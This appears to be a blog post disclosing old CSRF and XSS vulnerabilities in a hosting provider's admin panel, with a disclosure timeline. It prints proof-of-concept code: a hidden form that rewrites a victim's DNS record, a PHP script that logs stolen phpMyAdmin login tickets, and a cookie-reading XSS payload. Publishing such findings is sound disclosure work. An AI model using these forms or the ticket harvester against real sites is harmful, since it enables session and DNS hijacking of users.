All Articles CSRF and XSS

About a year ago I found a few vulnerabilities on the website. For those of you that don’t know, is a fairly big and cheap hosting provider in Scandinavia. I reported the issues, but some have not been fixed yet. Since it’s been so long and went silent in our communication, I’ve decided to disclose the following vulnerabilities.

They’re old and mostly don’t work any longer, but they might be interesting still.

Add DNS Record CSRF

At first, pretty much every function on the site for administrating your website was vulnerable to CSRF. I made a basic demo which changed the DNS settings of the user’s site which I sent to the staff.

Proof of concept code:

<script type="text/javascript" src="jquery-1.7.1.min.js"></script>

<form method="post" action="">
    <input type="hidden" name="subDomain" value="www" />
    <input type="hidden" name="type" value="WebAlias" />
    <input type="hidden" name="value" value="<evil ip address>" />
    <input type="hidden" name="advanced" value="true" />

<script type="text/javascript">
    $(document).ready(function () {
        setTimeout(function () {
        }, 2000)

This vulnerability was confirmed and was fixed pretty early.

phpmyadmin CSRF

Another vulnerabilty was in a redirect function which took the user from the admin interface at to their phpmyadmin interface. As a nice user-friendly touch it bypasses the authentication by the means of a generated ticket which it sent attached to a custom url in the phpMyAdmin application. By manipulating the url I managed to send the authentication ticket to my own server instead. Using CSRF I could then harvest a live ticket from a users session to gain access to their phpMyAdmin instance.


The url it redirects to contained a basic php script to dump the ticket from url and display a nice picture to lull the user. This way the image tag still loaded too. Yay!


file_put_contents("tickets.txt", $_GET['ticket'] . "\n", FILE_APPEND);

$name = 'ohnoes.jpg';
$fp = fopen($name, 'rb');

header("Content-Type: image/jpg");
header("Content-Length: " . filesize($name));

// dump the picture and stop the script


Using the ticket you could then gain access at the original redirect endpoint to the PHPMyAdmin site.

Premade blog/gallery password reset XSS

I also found some XSS in the premade blog and gallery websites which provides for you. These are likely not enabled by the user though and the ones I found were reflected via POST. Here is an example exploit:

<script type="text/javascript" src="jquery-1.7.1.min.js"></script>

<form method="POST" action="">
        value='	"><body onload="alert(document.cookie)"></body>'
    <input type="hidden" name="x" value="48" />
    <input type="hidden" name="y" value="15" />
    <input type="submit" id="csrfgo" />

<script type="text/javascript">
    $(document).ready(function () {


Contact attempt #1: 2013-03-21 CSRF. response: 2013-03-21 Confirmed issue.

PHPmyAdmin CSRF and minor xss: 2013-03-23

Contact attempt #2 after no fix: 2013-04-21

Queue nearly a year of no changes

The CSRF holes I found have been fixed or deprecated/removed in the new admin-interface. The minor XSS still remains to be fixed.